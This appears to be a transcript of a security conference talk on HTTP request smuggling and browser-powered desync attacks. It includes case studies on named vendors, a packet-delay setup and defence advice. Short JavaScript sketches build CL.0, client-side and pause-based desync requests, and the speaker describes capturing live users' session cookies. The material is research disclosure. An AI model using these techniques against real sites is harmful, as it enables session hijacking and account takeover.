Greetings. Welcome to track 4. This is the 3.30pm talk. This is James Kettle. He's going to talk about browser-powered desync attacks. Thank you. Good afternoon and welcome to browser-powered desync attacks. Have you ever had an idea and then just dismissed it because there's no way that it would ever work? Three years ago, I thought, wouldn't it be cool if you could make browsers launch desync attacks? That would enable some really interesting possibilities. But I figured that there was no way any web server was doing something foolish enough to make that possible. This year I discovered I was completely wrong. You can achieve all manner of interesting things, and in this session I'll show you how. Like many discoveries, the journey that led to it was quite winding. It started in late 2019, when there was a spate of request smuggling false positives, even including an incorrect CVE being issued for nginx. I had a look at what the cause of this issue was and declared that there was a simple solution: all you had to do was never reuse HTTP/1 connections when looking for request smuggling. And after that, well, everything was wonderful until last year, when I realised that connection-locked request smuggling was a thing, and the only way to find that is to always reuse HTTP/1 connections. So at this point we had a bit of a problem, and this year I set out to tackle it. After quite a lot of work, I eventually found that by slowing things down and paying really close attention to the exact sequence of events, I could reuse connections and still distinguish genuine vulnerabilities from false positives. And that was nice, but sometimes when you pay extra close attention to things, you find more than you bargained for. 
And on one website I noticed something just wasn't quite right. I pulled on that thread, and the attack that I ended up with broke my mental model for request smuggling, because this attack could be launched from the user's browser, which meant it didn't require a direct connection from the attacker, and that meant it didn't even require the vulnerable site to have a front-end server. That opens a whole new frontier of attack surface. So today I'm here to share with you a methodology and toolkit that I've built to navigate this new world, demonstrated with exploits on targets including Apache, Akamai, Varnish, amazon.com and multiple web VPNs. First we're going to get warmed up with HTTP handling anomalies. After that I'll share the client-side desync methodology using four in-depth case studies. Then I'll introduce pause-based desync and attempt a live demo, because it's so cool I couldn't resist. Then I'll talk about defence and key takeaways for the research, and wrap up with five minutes of questions. Now, there's quite a few different techniques in this presentation, and I really want them to work for you. So as part of that, whenever you see this logo on a slide, it means my team's built an online replica website with that vulnerability in it, so you can practice that technique on a real system online for free. I'm also releasing the code that powered every finding in this presentation, and whenever there's a named target you'll find full proof-of-concept exploit code in the white paper, even if I haven't managed to squeeze it onto a slide. Now we're going to start with a series of six esoteric vulnerabilities that directly led to the discovery of client-side desync attacks, but are also really quite interesting in their own right. But first there's something I need to tell you: the request is a lie. HTTP requests are a useful abstraction, but the harder you try to hold on to this concept, the less sense these techniques are going to make. 
At the end of the day, all we're doing is sending a stream of bytes, and what the server does with that is up to it. For example, it's all too easy to forget about HTTP connection reuse, because HTTP is supposed to be stateless, but sometimes state can creep in. Take this website that I found but sadly can't name. They had a reverse proxy in front, and it was set up to let me access sites intended to be public and not to access private sites on their intranet. It was deciding where to route the request using the Host header. But this front end was only validating the Host header of the first request on each TCP connection, so I could just send a request to the legit site first and then gain access to the internal systems. Now, fortunately this bug is quite rare, but there's a more common variation that I'll call first-request routing. Here the front-end server looks at the first request to work out which back-end to route it to, but then it passes all subsequent requests on that connection straight through to the same back-end system. By itself this behaviour is not really a vulnerability, but you can use it to hit any back-end with an arbitrary Host header, so you can use it to form part of an exploit chain that would otherwise be impossible. In this example here, I want to hit the back-end with a poisoned Host header so I can trigger a poisoned password reset email, but doing that directly isn't possible because the front end doesn't know where to route it. But once again, I just send a legit request first and then follow it up with the attack, and we successfully get a poisoned password reset email and hopefully access to someone's account. So hopefully that simple technique will come in useful for you, but there's also a broader takeaway here, which is that it's really good to peel away these abstractions sometimes, because they can hide behaviour that's really quite important. On to request smuggling. 
Well, you know the deal with this, hopefully: you just make the front end and back end disagree about the length of an HTTP request. You use that to apply a malicious prefix, shown in orange, to the victim's request, and that makes bad things happen to the victim. To encourage this disagreement to happen, you generally obfuscate the Transfer-Encoding header to hide it from one of the servers. So I was a bit puzzled when I found that I could trigger really suspicious behaviour on a large number of websites using AWS's Application Load Balancer with this HTTP/2 request. If you look at this request, you might wonder where the attack is, because this is a legitimate HTTP/2 request. It's spec-compliant; there isn't any obfuscation or anything like that, and yet somehow this was causing some kind of desync on these websites. After spending quite a while investigating it, as usual, I eventually decided what Amazon must be doing is inexplicably adding a header that said "actually, this message is chunked" when they forwarded it on to the back end, but not actually chunking it. And well, once I knew that, it was easy to turn this into an exploitable desync and hack a bunch of sites, so that was nice. I reported it to Amazon, and they fixed it really quite quickly too. But it left the question: why was Amazon doing that? Why did that even happen? And I think it's because web browsers always send a Content-Length header, even when they're using HTTP/2, even though that is not required over HTTP/2. And so Amazon just ended up with logic that said, well, if there isn't a Content-Length header, I guess it must be chunked. So that was a handy finding, but the real value of it was in the takeaway, which is that for request smuggling you don't necessarily need header obfuscation or any kind of ambiguity. All you need is a server taken by surprise. We're going to come back to that shortly. Now let's take a closer look at the connection-locked HTTP/1 request smuggling issue mentioned earlier. 
So, to confirm regular request smuggling, you send two requests and you confirm the first request affects the response to the second, as shown here. And this works great provided you send those two requests over separate connections, but to find a connection-locked vulnerability you have to send them over the same connection, like this. Now, here we're sending and receiving exactly the same bytes as shown on the previous slide, but now we have a problem, because we can no longer tell where the front end thinks the first request ends. And that means we can't tell if this system is actually vulnerable or not. The solution here is to realise that these bytes we're getting back aren't the only information we have. We also have timing information. If the front-end server thinks our message is chunked, that means it's already starting to generate a response before we send the orange payload. So if we pause before sending that payload and check the socket, and we see a response coming back, that tells us they're not using the Content-Length. They think this message is chunked, and they're not vulnerable to a CL.TE desync. Meanwhile, if we try to read and we don't get any data back for a few seconds, and then the rest of the attack pans out as usual, that proves the front end must be using the Content-Length, and therefore they're actually vulnerable. So I took that technique, I automated it, and I went scanning. And I found a few things. One of the mildly notable things was a system that was vulnerable because they were running Barracuda's web application firewall in front of IIS. Obviously it's old news that putting a web application firewall in front of something makes it easier to hack. But what was particularly interesting here was that Barracuda had actually issued a patch for this problem, but they hadn't flagged it as a full-on security fix. They just said it was a speculative hardening measure. 
So, as such, the client hadn't bothered to install it, and they were vulnerable. As usual, though, the best desync I found with this technique was the one that initially made absolutely no sense. After extensive testing, I was able to refine the attack sequence into this. Now, there's two things to unpack here. First off, as you can see, the back-end server is completely ignoring the Content-Length here. So that means this is a CL.0 desync, which is a rare attack class that hasn't been widely researched. Secondly, well, why are they ignoring that Content-Length? There's no reason. They're just ignoring it because they feel like it. It never occurred to me that a server might just arbitrarily ignore the Content-Length on a completely valid HTTP/1 request. And that has implications. It also left me wondering, given that I found this by accident with a scanning technique that wasn't even designed to find it: how many sites am I going to find if I go deliberately looking for this type of vulnerability? The answer was quite a few. My favourite one was amazon.com. They ignore the Content-Length on POST requests sent to the path /b. Using this, I got a server-side desync, so I made a simple proof of concept which stored random live users' HTTP requests, including their credentials, inside my Amazon wishlist. So I send this request a few times, I reload my wishlist, and I've got some random people's session cookies. So I reported that to Amazon, and they fixed it at some point. And then I realised that I'd made a terrible mistake, because I could have done a much cooler attack. This request exploits a random live user, right? And it's a legitimate HTTP request that can be triggered by a web browser. So if I'd used the HEAD technique to execute JavaScript in the victim's browser, I could have made every user that got hit by this spread the attack to 10 other users, thereby making a self-spreading desync worm and compromising every active user on Amazon. 
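To make that CL.0 shape concrete, here's a hedged sketch in the spirit of the amazon.com finding; the wishlist path, hostname and header are placeholders, not the real endpoints. The key detail is that the smuggled prefix is deliberately left unterminated, so the next request to arrive on the connection, including the victim's cookies, gets glued onto it.

```javascript
// CL.0 desync sketch: the back-end ignores the Content-Length entirely,
// so the "body" below is parsed as the start of a brand-new request.
function buildCl0Attack() {
  // Unterminated prefix (no final \r\n\r\n): the victim's request becomes
  // a continuation of this one, and its contents get stored server-side.
  const prefix =
    'POST /add-to-wishlist HTTP/1.1\r\n' +
    'Host: target.example\r\n' +
    'Foo: x';
  return (
    'POST /b HTTP/1.1\r\n' +
    'Host: target.example\r\n' +
    'Content-Length: ' + prefix.length + '\r\n' +
    '\r\n' +
    prefix
  );
}
```

The front end honours the Content-Length and treats this as one complete request; the back end stops reading at the blank line, leaving the prefix poisoning the connection.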
So that was a cool finding, and a missed opportunity too. And also a hint at an entire new attack class: client-side desync. Every desync, every request smuggling vulnerability that we've seen to date, has desynchronised the connection between the front-end server and the back-end server. But if you can make a web browser send a request that causes a desync, like you could on Amazon, then you can target the browser's own connection pool. And that means you can exploit sites that don't have a front-end/back-end architecture. This attack starts with the victim visiting the attacker's website, which sends two requests to the target site. The first request desynchronises the browser's connection to that website, so that the second request triggers a harmful response to go back to the victim and give the attacker control of the victim's account. To build these attacks, I've adapted the methodology from classic request smuggling. The main difference is that our entire exploit here needs to run in our victim's web browser, and that is an environment that's a lot more complex and uncontrolled than a dedicated hacking tool. So it's crucial to periodically take your technique as you've got it working inside your tool and try it out in the browser, to make sure that it works as expected in the real environment you want the attack to work in. Tooling-wise, I did all of this with custom code, which I've just released to GitHub, but I also helped design a new Burp Suite feature called Send Request Sequence, which offers similar functionality with a bit of a gentler learning curve. For the target browser, this technique seems to work on all browsers pretty much equally. Personally, I focused on Chrome, because Chrome has the best developer tools for building this kind of exploit. The first step towards a successful attack is to identify your client-side desync vector. This is an HTTP/1 request with three key properties. 
First and foremost, the server needs to ignore the Content-Length of this request. This will typically happen because you've triggered some kind of server error, or because you've taken the server by surprise: it just wasn't expecting a POST request to that endpoint. For example, here, this is one of the more effective techniques: I'm just doing a POST request to a static file. They don't expect it, and as such, if the server is vulnerable, they're likely to ignore the fact that I've said I'm going to send more content than I actually have. I've sent Content-Length 5, and I've sent one byte of data. If the server replies to this request immediately, it suggests that they're ignoring the Content-Length I've sent, and they're quite likely to be vulnerable. Secondly, this request needs to be triggerable cross-domain from inside a web browser. That means you can't use things like header obfuscation, and you can't even specify any special headers, really. Also, the target server can't advertise support for HTTP/2, because this is an attack that exploits the fact that HTTP/1 is dire, and browsers will aggressively prefer to use HTTP/2. The only scenario where a site that uses HTTP/2 is going to be exploitable via this is if your target victim is using a corporate proxy or something that only supports HTTP/1, which is fairly unlikely. Finally, the server needs to leave the connection open after it's handled this request. Once you've found this, the next step is to just take it and see if it works inside a real browser, which you can do with some JavaScript that looks something like this. Here, we're sending two requests: the first one is going to desync the connection, and the second request is just a browser navigation, which should hopefully suffer the consequences of the connection being desynced. Now, there's two flags worth mentioning in this attack request. First off, I'm specifying mode 'no-cors'. 
This is not required for a successful attack, but what it does is mean we can actually see what's happening inside the developer tools, so it's useful for debugging when things go wrong, which they will do quite a lot. Secondly, I'm specifying credentials 'include'. This is really important, because browsers have multiple connection pools per website, and if you poison the wrong connection pool, then I can promise you an extremely frustrating time. So I specify that, and you'll probably poison the right one. Now, when you run this, if it's successful, you should see two requests in the dev tools with the same connection ID, and you should see that the second response has been affected by the malicious prefix from the first request, as shown here. At this point, it's just time to build an exploit. This is quite a powerful primitive, so you've got three main options. First off, you can try to store the user's request somewhere where you can later retrieve it, kind of like I did on Amazon. That works just the same as regular server-side request smuggling, so I'm not going to waste any time talking about it in more detail. Secondly, there's an all-new option, which is chaining and pivoting. A client-side desync means that you can make your victim's browser send arbitrary bytes to the target website. So what it does is turn their browser into your personal attack platform, and it puts extra attack surface within your reach. For example, you can make them put Log4Shell payloads wherever you like, and you can even hit authenticated attack surface using their credentials, in a way that's a bit like cross-site request forgery, but more powerful, because it doesn't have all the limitations that browsers normally put on cross-domain requests. What I'm going to focus on, though, is exploiting the end user. 
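Putting those two flags together, a reconstruction of the in-browser probe might look like the following. This is a sketch rather than the exact code from the slides: the target URL and smuggled path are placeholders.

```javascript
// Smuggled prefix left unterminated, so the browser's own follow-up
// request completes it on the poisoned connection.
const PREFIX =
  'GET /hopefully404 HTTP/1.1\r\n' +
  'Foo: x';

// Runs on the attacker's page in the victim's browser.
async function attack() {
  // Request 1: the desync vector. A vulnerable server ignores the
  // Content-Length, leaving PREFIX sitting on the connection.
  await fetch('https://target.example/resources/style.css', {
    method: 'POST',
    body: PREFIX,
    mode: 'no-cors',          // lets us watch the request in dev tools
    credentials: 'include',   // poison the credentialed connection pool
  });
  // Request 2: a navigation that should reuse the poisoned connection
  // and receive the response to PREFIX instead of the page it asked for.
  location = 'https://target.example/';
}
```

On success, the dev tools show both requests sharing a connection ID, with the second response answering the smuggled prefix.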
I've tried a lot of different techniques and had the most success with two well-known approaches from server-side request smuggling, with certain tweaks applied, which we're going to have a look at in the case studies. So for our first case study, we're going to exploit a straightforward vulnerability that affected a huge number of websites built on the CDN Akamai. This attack vector is nice and simple: to cause a desync, you just need to do a POST request that triggers a redirect from the front end. Confirming this in a browser is also really easy. Here, I've just crafted the prefix so that when the browser follows this redirect from the front end, it ends up seeing the contents of the robots.txt file. For the exploit, I'm going to use the HEAD technique. Now, if you're not familiar with this technique, it's documented in more detail in last year's presentation on HTTP/2, but the short version is: with the HEAD technique, you use the method HEAD to queue up multiple responses that, when combined, are harmful and let us execute JavaScript from the target site in our victim's browser. And when you're doing server-side request smuggling, it's that simple. But because this is client-side, there's a couple of other things that we need to fix first. The first problem is that the initial response coming back to the web browser is a 301 redirect, and as such, the browser is just going to follow that redirect, and that's going to use the poisoned connection and mess up our attack. The second problem is the stacked-response problem. Whenever Chrome reads in a response from the server, it deliberately does a little over-read. It tries to read more data than the server said it was going to send, just to see if there's any extra data lying around. And if it sees anything, it quietly dumps the connection and breaks the attack. Fortunately, both issues are easily resolved on Akamai. 
So you can fix the stacked-response problem by delaying the second response so it arrives after Chrome does its little check. In this scenario, I was able to do that by adding a cache buster to the request so that it incurred a cache miss and went all the way to the back end, which was slow and old, and therefore took ages to respond, which meant it arrived late and Chrome didn't see it. The second problem, of the browser following the redirect, is easily fixed by changing mode 'no-cors' to mode 'cors', which means when the browser sees the redirect, it throws an exception, which we can then catch ourselves and continue with our attack, ultimately leading to a successful exploit. For our next target, we'll hit Cisco's Web VPN. This technique seems to work on lots of web VPNs for some reason. I think it's because they tend to code their own web servers for security reasons, which backfires. So here, we can trigger a desync simply by doing a POST request to their home page. It couldn't be much easier, to be honest. And with that, we can easily trigger a redirect to our website. In theory, that redirect could let us hijack a JavaScript resource load and take full control over the page. But there's a bit of a problem, because when a web browser renders a page, it loads all the resources at the same time, and that makes it really quite hard to successfully hijack the correct file. Fortunately, there was an easy solution on this target, because this redirect response is cacheable. So if we poison the connection with our redirect, and then we tell the browser to navigate to the target JavaScript file, which is /win.js here, then they'll get that redirect back, and they'll just get bounced back to our website by the redirect. But they'll also save the redirect in their cache. So when they land back on our website, we can send them onwards to the Web VPN's login page. 
And when the login page starts to get rendered, it's going to try to load that JavaScript file, end up loading our poisoned version from the cache, import our JavaScript, and give us the user's password. So I reported this to Cisco, and they didn't say anything for a while, and then they said they're going to deprecate this product, so they're not going to fix this issue. But they are issuing a CVE for it. So that's nice. I hope you're not using it. On verisign.com, you could trigger a desync using a URL-encoded forward slash. Don't ask me how I found that. But unfortunately, that wasn't the only thing a bit unusual about their setup. For reasons that I don't have time to explain in any detail, to get a working exploit I had to use the HEAD technique, but I had to do it with a HEAD request that had a body, and the body had to be chunked, which meant I had to judge the chunk size so the follow-up request would perfectly slot inside that chunk and close off the request. This unbelievably did actually work, but the interesting thing here, the reason it's worth mentioning, is that this approach is exclusive to client-side desync. If you're doing a server-side desync, you don't control what the next request to hit the server is going to be, so you can't accurately predict its size, and this technique is basically completely implausible. So it's worth bearing in mind that although client-side desync can be quite painful sometimes, you do have options. Speaking of painful, for our final case study, we're going to target Pulse Secure VPN. Here, you can cause a desync by doing a POST request to the robots.txt file, and just like Cisco's Web VPN, they've got a Host-header redirect gadget that we'd like to use to hijack a JavaScript import, but this time the redirect isn't cacheable. So we're in this unpleasant scenario where our attack timing is crucial, and I had to take three steps to make this remotely reliable. 
First off, I pre-connect the victim browser to the target site to reduce the effect of network jitter on the attack timings. This might not make any difference, but I was kind of desperate. Secondly, our attack is going to fail sometimes, so it's essential that we can have multiple attempts, but a failed attempt leaves the victim on the target website, out of our control. To deal with that, I just run the attack in a separate tab, which means we can have as many attempts as we like, except for one other potential problem, which is that if an attack fails and the browser ends up caching the genuine JavaScript file, then we can't poison that file until that cache entry has expired, which could be weeks. But I was able to avoid that issue by finding a page on Pulse Secure's VPN that had a JavaScript import that never got cached, because the file they were trying to import didn't actually exist. So by combining all of these, we got a successful attack, which hopefully looks something like this. Yeah, so you can see a tab pops open, and then the victim site gets reloaded a couple of times, and we get control. I reported that to Pulse Secure, and to be honest, I'm not sure what's happened. They didn't say anything for ages, and then they said they'd fixed it, but I can't find the fix. So who knows? Now, we saw earlier that slowing down and pausing can reveal useful information, and as it turns out, pausing can also create entire new desync vulnerabilities. To trigger a pause-based desync on a vulnerable server, you start by sending your headers, promising a body but not sending it, and then just waiting. Eventually, you'll get a response, generally after a server timeout is hit, and then when you finally send the body, they'll treat it as a new request. I initially found this on Varnish, and just in case you think that was really clever of me, it was actually because multiple bugs in my code combined to trigger this condition. 
But once I saw it on Varnish, I was like, oh, that's cool, that's what I'm looking for, and I found it works on Apache too, which is pretty cool. It tends to happen when the server generates a response itself instead of forwarding the request to the back-end server or handing it off to the application layer, and this single vulnerability enables two distinct attacks. So first off, we're going to use it to cause a traditional server-side desync. The front-end server must stream the request to the back end; in particular, it must forward the request headers without attempting to buffer the entire request body first. So to find the bug here, well, you send your headers and you wait for their timeout, but you probably won't realise when the timeout happens on the back end, because the front end generally won't forward the response on to you until it's seen you send a complete request. So in practice, you need to send your headers, wait until you think a timeout has probably happened on the back end, and then send the rest and the next request, and hopefully get a successful attack. So I've updated Turbo Intruder to add a couple of different ways of saying where in the request you want to pause and how long you want to pause for. So that's it. It's fairly simple. And you might be wondering, well, what front-end servers actually stream requests like this? To be honest, I couldn't be bothered looking at very many, but it worked on the first one I tried, which was Amazon's Application Load Balancer. However, there's one extra catch, which is that they've got a defensive measure I'll call early-response detection. It's a bit like the Chrome behaviour we saw earlier, but slightly different. If Amazon's ALB sees the response coming in from the back end before our request is completed, it'll forward that response on, but then it'll dump the connection. It won't reuse it, and our attack will fail. 
Fortunately, this seems to be designed to prevent bugs rather than actual attackers, and there's a really obvious race condition in it, so it's quite easy to bypass. All you need to do is identify the back-end timeout and make the orange payload hit the front end in the time window between the back end generating that timeout response and the front end noticing it. In other words, this attack may take a few attempts, but it's worth it. There's one final challenge that you might encounter, which is more severe. This is when the front end and the back end have the same request timeout configured. On ALB, that creates a race condition within a race condition and makes life incredibly painful. I thought it might be possible to avoid this issue by resetting the front-end timeout without resetting the back-end timeout, by sending data that the front end normalises away and then doesn't send on to the back end. And that might work on some servers, but it didn't work on ALB, and after a while of everything I tried failing, even when it was really cool conceptually, I just gave up and set a vanilla attack running. And 66 hours later, it was successful. So this is one for the patient. So that was a server-side pause-based desync, and it just leaves us with one final question, which is: is there such a thing as a client-side pause-based desync? Now, I couldn't find a way to make a browser pause halfway through issuing a request. But SSL and TLS don't stop attackers from delaying your traffic. So there is a potential attack where the attacker triggers a request from your browser that's really big, so it gets split into multiple packets, and then all they have to do is delay the right packet, and they can trigger a pause-based client-side desync and exploit you. Now, that might sound quite theoretical. It certainly sounded theoretical to me. And this is DEF CON. 
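A hedged sketch of such a padded request: enough filler that the body spans multiple TCP packets, with the smuggled prefix at the end, in the packet the attacker's middle box will delay. The padding size, URL and prefix are all placeholders rather than real values.

```javascript
// Client-side pause-based desync sketch. The padding forces the request
// across several packets; delaying the final one past the server timeout
// leaves the smuggled prefix to be parsed as a fresh request.
const PADDING = 'x'.repeat(2048);
const SMUGGLED = 'GET /smuggled HTTP/1.1\r\nFoo: x';

// Runs on the attacker's page in the victim's browser.
async function pausedAttack() {
  await fetch('https://target.example/', {
    method: 'POST',
    body: PADDING + SMUGGLED,
    mode: 'no-cors',
    credentials: 'include',
  });
}
```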
So I've made a proof of concept that uses this technique on a default Apache-based website to execute arbitrary JavaScript and kind of break TLS. And now I'm going to attempt a live demo. The code on the client side looks fairly like a regular client-side desync, but we've got tons of padding to make the request big so it gets split into multiple packets. On the attacker's middle box, I used the traffic control (tc) facility, with some code like this that just says: delay the packet to the target site by 61 seconds if it's between 700 and 1,300 bytes, because that seems to work. As you may guess, this is not the world's most reliable technique, because you obviously can't decrypt the packets. They're encrypted. You just look at how big they are and kind of guess. But let's have a go and see what happens. Okay, cool. So the victim browser is just going to SOCKS-proxy to a box on Amazon that's being man-in-the-middled, just so the local network doesn't blow things up too much. It's just a SOCKS proxy; it's not breaking TLS or anything like that. Here we're going to connect to the attacker machine. Apologies about the size of the font. What if I do this? Yeah, okay. So here we can see this code. I've got the injects, the delay. The only change is I'm just doing a six-second delay here, because I reduced the server timeout so that the demo doesn't take ages. And I'm running tcpdump on the attacker's box. So if the attack works, if the browser decides to send the correct packet size for me, then we're going to see a few packets go through and then one large packet being re-sent over and over. That's because the victim machine knows it hasn't been received by the server, because we're delaying it, so it's just trying to re-send it. That's just TCP. But the attacker is delaying all of these re-send attempts until it finally lets them through. We get a client-side desync, and if it's successful, we'll see the attacker's box in the victim browser. 
So as you can see, I've just got the attack code shown earlier here. I'm going to hit execute.js, and we'll see what happens. Okay, great. We can see one packet being re-sent a bunch of times, and over here, in about three seconds, maybe, yes. There we go. Thanks. So that was... Oh, so we don't even need the backup video. All right. So, yeah, hope you enjoyed that demo. That was the final attack of the presentation. Hopefully most of them made sense. Let's talk about defence. These attacks almost all exploit HTTP/1, so if you can, I would recommend using HTTP/2 end-to-end. That said, if you can't use it end-to-end, don't do HTTP/2 downgrading, because that makes things even worse. Secondly, I don't know how people are going to react to this, but my view is: it's really easy to make an HTTP/1 server, but really difficult to make an HTTP/1 server that's secure. So I would say, don't code your own HTTP server if at all possible. That said, software diversity is a healthy thing, so here's some advice that will help make your server slightly less prone to these kinds of vulnerabilities, if you need to patch one of them and using HTTP/2 end-to-end is not an option. Now, I've got a nice bonus slide for DEF CON. I think this topic has serious potential for further research, so I'm going to outline seven possible research angles, roughly in order of the time commitment required and how likely I think they are to actually work. First off, more ways of making a server ignore the Content-Length would be really valuable. You can use these for both a server-side desync and a client-side one, especially if it's triggered by a request that you can send from a web browser. Secondly, as we've seen, client-side desync exploitation can be quite hard, so more ways of building exploits would be really valuable. And in particular, the whole chain-and-pivot exploit path is under-researched. It basically didn't occur to me until I was writing the presentation. 
So, third: because you can send arbitrary bytes, you might even be able to fake a protocol upgrade and change protocol to WebSockets or something, which might be fun. Fourth, currently, server-side pause-based desync vulnerabilities are really hard to detect. You're best off basically looking for the server banner that says they're using Apache and then trying the technique. So a reliable way to find this issue when the vulnerable server's behind a front end would be really nice. Fifth, it would be amazing if you could trigger a pause-based desync without needing a man in the middle. It feels like something that should be possible. It should be possible to make a browser just stall halfway through a request, somehow. I just don't have any ideas how. Sixth, this is a valuable attack class right now, but it's going to get less valuable over time as HTTP/2 adoption increases, unless someone figures out a way of forcing browsers to use HTTP/1. Again, I haven't got an idea, but it might be possible. And finally, I think this one's a pretty good lead: exploration of equivalent attacks on HTTP/2. I've seen some hints that vulnerabilities similar to client-side desync could happen with HTTP/2. I don't think it's going to be as common, because it kind of requires a state-machine flaw on the server, but I'm fairly sure it will happen sometimes, and that would be quite nice. So there's plenty of further reading available. The three things I'd suggest are: check out the white paper, which also includes these slides; that's the top link on this page. Have a shot at the online interactive labs to get some real experience with these techniques. And then grab the tools I've released, do some scanning and find some real vulnerable systems. Feel free to chat with me by email and let me know how it goes. Also, there's a kind of related presentation tomorrow by Martin which is really good. I would suggest checking that out if you enjoyed this. 
And finally, the three key things to take away are: the request is a lie; HTTP/1 connection reuse is harmful; and all you need is a server taken by surprise. I'll take five minutes of questions now. If you have any more after that, feel free to come and chat to me at the back, or just chuck me an email. Don't forget to follow me on Twitter. Thank you for listening. Any questions? Yep. Could the attack work on HTTP/2 servers that have an HTTP/1 server in front? Yes, you could potentially do a client-side desync on that. Cool, thank you.